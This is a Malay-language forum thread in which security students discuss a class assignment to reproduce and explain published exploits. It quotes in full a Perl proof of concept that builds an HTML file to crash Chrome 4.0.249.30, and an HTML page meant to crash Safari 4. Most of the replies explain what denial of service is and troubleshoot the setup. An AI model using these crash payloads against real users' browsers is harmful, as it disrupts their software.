Forum Sementara Putera.com

Bersama kita perkemaskan forum ini sementara forum asal dalam pemulihan.

Forum putera dah kembali. Masalah sudah berjaya diselesaikan. Sila lawati http://forum.putera.com/tanya


    security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit.

    Share

    ahfat797
    Ahli Baharu
    Ahli Baharu

    Number of posts : 22
    Registration date : 30/01/2010

    security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit.

    Post by ahfat797 on Sat Jan 30, 2010 3:15 pm

    salam wbt..

    sem ni aku bru amek subject ITT450. security..
    nk minx jasa baik korang sume bagi pendapat dgn soalan ni..
    aku x faham ape pn.. ape yg patut aku buat?
    harap membantu.

    http://www.packetstormsecurity.org/1001-exploits/index6.html
    googlechrome-dos.txt
    Description:
    Google Chrome version 4.0.249.30 denial of service proof of concept exploit.


    #!/usr/bin/perl
    #google chrome 4.0.249.30 DoS PoC
    #
    #
    #Author: Teo Manojlovic
    #
    #Info: In ordinary cases browser would redirect to "http://www.google.com"
    #but in this case browser will report error for something that should
    #be possible and is possible on other browsers.
    #
    #
    #
    #I would like to thank Jeremy Brown who made very nice fuzzer for browser
    #
    #
    #
    #
    #
    #
    #
    #Ipak lik nije tolika seljacina koliko sam mislio da je, jer mu pdf fuzzer malo suxa


    $file="poc.html";
    $poc='a/' x 10000000;
    open(myfile,">>$file");
    print myfile '<head><meta http-equiv="refresh" content="1; url=http://www.google.com"></head>';
    print myfile "<body alink=";
    print myfile $poc;
    print myfile '">';
    close(myfile);
    print "Finished\n";

    TQ guys..

    johnburn
    Moderators
    Moderators

    Gender : Male Number of posts : 755
    Location : Terengganu
    Registration date : 07/03/2009

    Re: security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit.

    Post by johnburn on Sat Jan 30, 2010 9:41 pm

    ahfat797 wrote:salam wbt..

    sem ni aku bru amek subject ITT450. security..
    nk minx jasa baik korang sume bagi pendapat dgn soalan ni..
    aku x faham ape pn.. ape yg patut aku buat?
    harap membantu.
    aku xpham ape yg ko nak tnye sbnrnye ni Razz
    ko xtau nk run perl script ke xtau ape itu dos?

    btw, script tu akan generate file poc.html yg mne kandungan dia:

    <head><meta http-equiv="refresh" content="1; url=http://www.google.com"></head><body alink=a/">

    dlm file yg di generate tu, a/ 10000000 kali. aku xdpt reproduce keadaan tu sbb aku xde chrome versi yg vulnerable tersebut. Tp basically, browser chrome yg vulnerable tersebut akan crash sbb xckup resource nk handle malformed code yg ade dlm file tersebut. sedikit bacaan berkenaan browser dos:
    http://everything2.com/title/Web+browser+denial-of-service+attacks


    --------------------------------------------

    tahukah kamu saat kamu menangis
    adalah air mata ku yang jatuh berlinang
    tahukah kamu saat kamu tersakiti
    adalah aku yang pertama terluka
    Jangan Klik

    ahfat797
    Ahli Baharu
    Ahli Baharu

    Number of posts : 22
    Registration date : 30/01/2010

    Re: security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit.

    Post by ahfat797 on Sun Jan 31, 2010 11:47 am

    salam bro johnburn..
    ape sebenarnye vulnerable tu?

    ape mksd sebenar soalan ni?
    Google Chrome version 4.0.249.30 denial of service proof of concept exploit.

    n mcm mane nk run perl script tu?

    n bole terang kn ckit mksd dos?

    http://everything2.com/title/Web+browser+denial-of-service+attacks
    aku da bace, tp x faham sgt..


    TQ bro, maaf bnyk tanye, bru belajar =)

    johnburn
    Moderators
    Moderators

    Gender : Male Number of posts : 755
    Location : Terengganu
    Registration date : 07/03/2009

    Re: security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit.

    Post by johnburn on Sun Jan 31, 2010 12:56 pm

    untuk run script perl, ko kne install perl. bleh pkai yg ni:
    http://www.activestate.com/activeperl/

    apabila ko runkn script perl tu, dia akan hasilkn file ni (download dan extract file zip ni):
    http://www.4shared.com/file/211884612/3017f198/pochtml.html

    Denial of service merupakan satu teknik/serangan yg digunakan yang menghalang legitimate users dari mendapat akses kepada service/resource atau info yg spttnya. Satu contoh mudah, attacker dpt menghalang ko dr access ke sesuatu website dgn dosing server website tu samada dgn cara flooding server site tu dgn request dr attcker atau dgn cara len. so server akan xckup resource untuk handle request dr ko.

    sekarang, cuba ko test bkak file poc.html yg aku bg atas tu dlm chrome versi 4.0.249.30 dan tgk ape jd. spttnye browser tersebut akan crash sbb xcukup resource untuk handle malformed code yg ada dlm file tersebut.

    http://blog.ncircle.com/blogs/vert/archives/2008/06/browser_denial_of_service_does.html


    --------------------------------------------

    tahukah kamu saat kamu menangis
    adalah air mata ku yang jatuh berlinang
    tahukah kamu saat kamu tersakiti
    adalah aku yang pertama terluka
    Jangan Klik

    ahfat797
    Ahli Baharu
    Ahli Baharu

    Number of posts : 22
    Registration date : 30/01/2010

    Re: security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit.

    Post by ahfat797 on Sun Jan 31, 2010 3:12 pm

    bro johnburn,
    link install perl ni xley pun..
    http://www.activestate.com/activeperl/
    kuar msg:
    This installation package could not be opened.
    Contact the application vendor to verify that this is a valid Windows installer package.

    johnburn
    Moderators
    Moderators

    Gender : Male Number of posts : 755
    Location : Terengganu
    Registration date : 07/03/2009

    Re: security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit.

    Post by johnburn on Sun Jan 31, 2010 3:14 pm

    pkai os ape?


    --------------------------------------------

    tahukah kamu saat kamu menangis
    adalah air mata ku yang jatuh berlinang
    tahukah kamu saat kamu tersakiti
    adalah aku yang pertama terluka
    Jangan Klik

    ahfat797
    Ahli Baharu
    Ahli Baharu

    Number of posts : 22
    Registration date : 30/01/2010

    Re: security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit.

    Post by ahfat797 on Sun Jan 31, 2010 3:20 pm

    johnburn wrote:pkai os ape?

    XP bro

    ahfat797
    Ahli Baharu
    Ahli Baharu

    Number of posts : 22
    Registration date : 30/01/2010

    Re: security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit.

    Post by ahfat797 on Sun Jan 31, 2010 3:26 pm

    kalau aku run pochtml.html kt chrome versi 4.0.249.30
    http://www.4shared.com/file/211884612/3017f198/pochtml.html
    jd mcm ni ke?

    http://img718.imageshack.us/img718/8558/googlechromepoc.png

    johnburn
    Moderators
    Moderators

    Gender : Male Number of posts : 755
    Location : Terengganu
    Registration date : 07/03/2009

    Re: security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit.

    Post by johnburn on Sun Jan 31, 2010 3:34 pm

    yeah dia akan crash mcm tu
    cube run kt latest version chrome xsilap aku v 5 ke atas
    spttnya dh xcrash dan die akan redirect ke page google pas run poc.html tu.


    --------------------------------------------

    tahukah kamu saat kamu menangis
    adalah air mata ku yang jatuh berlinang
    tahukah kamu saat kamu tersakiti
    adalah aku yang pertama terluka
    Jangan Klik

    hampeh
    Ahli
    Ahli

    Number of posts : 866
    Registration date : 28/02/2009

    Re: security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit.

    Post by hampeh on Sun Jan 31, 2010 3:36 pm

    hehe, ntah2 ko kelas network security dengan aku ..

    johnburn
    Moderators
    Moderators

    Gender : Male Number of posts : 755
    Location : Terengganu
    Registration date : 07/03/2009

    Re: security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit.

    Post by johnburn on Sun Jan 31, 2010 3:37 pm

    anyway, dh dpt instal perl blom?


    --------------------------------------------

    tahukah kamu saat kamu menangis
    adalah air mata ku yang jatuh berlinang
    tahukah kamu saat kamu tersakiti
    adalah aku yang pertama terluka
    Jangan Klik

    ahfat797
    Ahli Baharu
    Ahli Baharu

    Number of posts : 22
    Registration date : 30/01/2010

    Re: security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit.

    Post by ahfat797 on Sun Jan 31, 2010 3:44 pm

    johnburn wrote:anyway, dh dpt instal perl blom?

    xdpt lg..
    ade link lain x?

    ahfat797
    Ahli Baharu
    Ahli Baharu

    Number of posts : 22
    Registration date : 30/01/2010

    Re: security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit.

    Post by ahfat797 on Sun Jan 31, 2010 3:46 pm

    hampeh wrote:hehe, ntah2 ko kelas network security dengan aku ..

    ckp la nik mariza lectrer ko?
    ke bro ali?

    hampeh
    Ahli
    Ahli

    Number of posts : 866
    Registration date : 28/02/2009

    Re: security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit.

    Post by hampeh on Sun Jan 31, 2010 3:47 pm

    edit:john burn , alang2 ko kat sini nak tanya sikit ... selalu exploit kat packetstormsecurity tu 100% boleh jalan ke ? pasal aku try tak dapat. mungkin version safari aku lain agaknya..

    sori aku silap edit post ko. septtnya nk tkan quote haha
    -johnburn-


    Last edited by hampeh on Sun Jan 31, 2010 3:49 pm; edited 1 time in total

    ahfat797
    Ahli Baharu
    Ahli Baharu

    Number of posts : 22
    Registration date : 30/01/2010

    Re: security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit.

    Post by ahfat797 on Sun Jan 31, 2010 3:49 pm

    hampeh wrote:assignment dorang dua tu sama ke ?pn nik mariza aku nyer lecturer.

    haha, same class mehh..
    asgmnt kt packetstormsecurity.org
    sape ea ko?

    johnburn
    Moderators
    Moderators

    Gender : Male Number of posts : 755
    Location : Terengganu
    Registration date : 07/03/2009

    Re: security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit.

    Post by johnburn on Sun Jan 31, 2010 3:52 pm

    ahfat797 wrote:
    xdpt lg..
    ade link lain x?
    pastikan ko download versi yg btol. kl windows ko 32 bit, download yg x86 tu. try download blk mne tau td tu download die corrupt ke ape. kl still xleh, try update windows installer:
    http://support.microsoft.com/kb/893803

    err sbnrnye ape assignment korang ni? care to share? Razz


    --------------------------------------------

    tahukah kamu saat kamu menangis
    adalah air mata ku yang jatuh berlinang
    tahukah kamu saat kamu tersakiti
    adalah aku yang pertama terluka
    Jangan Klik

    johnburn
    Moderators
    Moderators

    Gender : Male Number of posts : 755
    Location : Terengganu
    Registration date : 07/03/2009

    Re: security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit.

    Post by johnburn on Sun Jan 31, 2010 3:55 pm

    hampeh wrote:edit:john burn , alang2 ko kat sini nak tanya sikit ... selalu exploit kat packetstormsecurity tu 100% boleh jalan ke ? pasal aku try tak dapat. mungkin version safari aku lain agaknya..

    yang ada kt packetstorm tu biasanya yg dh di test dan biasanya dh kuar patch pn. so kl ko nk test jd x, ko kne test la dgn version yg vulnarable seperti yg di letakkan dalm penerangan dia.


    --------------------------------------------

    tahukah kamu saat kamu menangis
    adalah air mata ku yang jatuh berlinang
    tahukah kamu saat kamu tersakiti
    adalah aku yang pertama terluka
    Jangan Klik

    hampeh
    Ahli
    Ahli

    Number of posts : 866
    Registration date : 28/02/2009

    Re: security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit.

    Post by hampeh on Sun Jan 31, 2010 3:58 pm

    still tak jadik . walaupun aku try .. kalau tengok code dia simple je + aku da pakai safari 4.0 dari filehippo.

    Code:
    ###################################################################
    # Safari 4 Remote Crash Vulnerability
    ###################################################################
    Vulnerability:
    Because this is a test Safari 4 browser's memory handling that end, we have created a test page document, and its code is:
    <html>
    <code dir= “/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X
    /X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X
    /X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X
    /X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X
    /X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X
    /X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X” >
    </html>
    Open file by Safari 4 , Safari 4 browser crashed!
    ###################################################################
    # Discoverd By: Securitylab.ir
    # Website: http://securitylab.ir
    # Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir
    ###################################################################



    err sbnrnye ape assignment korang ni? care to share?
    Kena pilih satu exploit kat packetstorm tu pastu try sendiri + terangkan kat lecturer nih , kalau aku ingat lagi la . haha

    ahfat797
    Ahli Baharu
    Ahli Baharu

    Number of posts : 22
    Registration date : 30/01/2010

    Re: security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit.

    Post by ahfat797 on Sun Jan 31, 2010 4:05 pm

    nasir..
    ko post kt ilearn 5.44pm
    better ko inform dgn pn, sebab die ckp sblum kul 5.00pm,
    takut die x approve

    johnburn
    Moderators
    Moderators

    Gender : Male Number of posts : 755
    Location : Terengganu
    Registration date : 07/03/2009

    Re: security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit.

    Post by johnburn on Sun Jan 31, 2010 4:07 pm

    hampeh wrote:still tak jadik . walaupun aku try .. kalau tengok code dia simple je + aku da pakai safari 4.0 dari filehippo.

    Kena pilih satu exploit kat packetstorm tu pastu try sendiri + terangkan kat lecturer nih , kalau aku ingat lagi la . haha

    try bukak link ni ngan safari 4 yg ko install tu dan tgk crash x:
    http://www.zongeek.net/safari.html

    mcm2 la budak IT kn Razz


    --------------------------------------------

    tahukah kamu saat kamu menangis
    adalah air mata ku yang jatuh berlinang
    tahukah kamu saat kamu tersakiti
    adalah aku yang pertama terluka
    Jangan Klik

    hampeh
    Ahli
    Ahli

    Number of posts : 866
    Registration date : 28/02/2009

    Re: security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit.

    Post by hampeh on Sun Jan 31, 2010 4:08 pm

    aiseh kantoi nama sebenar .. kuikui. Sori menyemak thread ko + menyusahkan pulak john burn nak menjawab. I love you

    ko post kt ilearn 5.44pm
    better ko inform dgn pn, sebab die ckp sblum kul 5.00pm,
    takut die x approve

    Ilearn tak dapat masuk , nak post pun slow hari tu .. huhu..

    hampeh
    Ahli
    Ahli

    Number of posts : 866
    Registration date : 28/02/2009

    Re: security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit.

    Post by hampeh on Sun Jan 31, 2010 4:10 pm

    johnburn wrote:
    try bukak link ni ngan safari 4 yg ko install tu dan tgk crash x:
    http://www.zongeek.net/safari.html
    Tak jadi apa2,nampak page kosong je sama macam aku test .

    mcm2 la budak IT kn Razz
    What a Face


    edit: termasuk yang ni dah 2 dah safari 4 punya exploit tak jalan , lagi satu pakai javascript. Dari sini safari 4 dos source link

    johnburn
    Moderators
    Moderators

    Gender : Male Number of posts : 755
    Location : Terengganu
    Registration date : 07/03/2009

    Re: security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit.

    Post by johnburn on Sun Jan 31, 2010 4:14 pm

    hampeh wrote:
    edit: termasuk yang ni dah 2 dah safari 4 punya exploit tak jalan , lagi satu pakai javascript. Dari sini safari 4 dos source link

    aku xdpt nk pastikan sbb aku xde safari. sebolehnya kl nk reproduce keadaan tu, ko kne set up envrmnt yg lbh kurang same cm yg exploit tu di test. cntoh cm kt link tu, die test kt Safari 4.0, Windows XP SP3


    --------------------------------------------

    tahukah kamu saat kamu menangis
    adalah air mata ku yang jatuh berlinang
    tahukah kamu saat kamu tersakiti
    adalah aku yang pertama terluka
    Jangan Klik

    hampeh
    Ahli
    Ahli

    Number of posts : 866
    Registration date : 28/02/2009

    Re: security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit.

    Post by hampeh on Sun Jan 31, 2010 4:18 pm

    Hmm.. okeh aku kena try pakai sp3 sekarang ni pakai sp2(huhu) . Tq membantu , sori kacau thread tuan tanah . Very Happy

    ni link kalau ko nak try safari 4 john burn , sama macam dalam yang 2nd exploit
    http://www.filehippo.com/download_safari/5793/

    johnburn
    Moderators
    Moderators

    Gender : Male Number of posts : 755
    Location : Terengganu
    Registration date : 07/03/2009

    Re: security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit.

    Post by johnburn on Sun Jan 31, 2010 4:20 pm

    no hal. kl xjd gak, cari la exploit len
    melambak kt packetstorm tu
    yg penting ko kne tau knapa jd cmtu


    --------------------------------------------

    tahukah kamu saat kamu menangis
    adalah air mata ku yang jatuh berlinang
    tahukah kamu saat kamu tersakiti
    adalah aku yang pertama terluka
    Jangan Klik

    Sponsored content

    Re: security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit.

    Post by Sponsored content Today at 11:58 am


      Current date/time is Thu Dec 08, 2016 11:58 am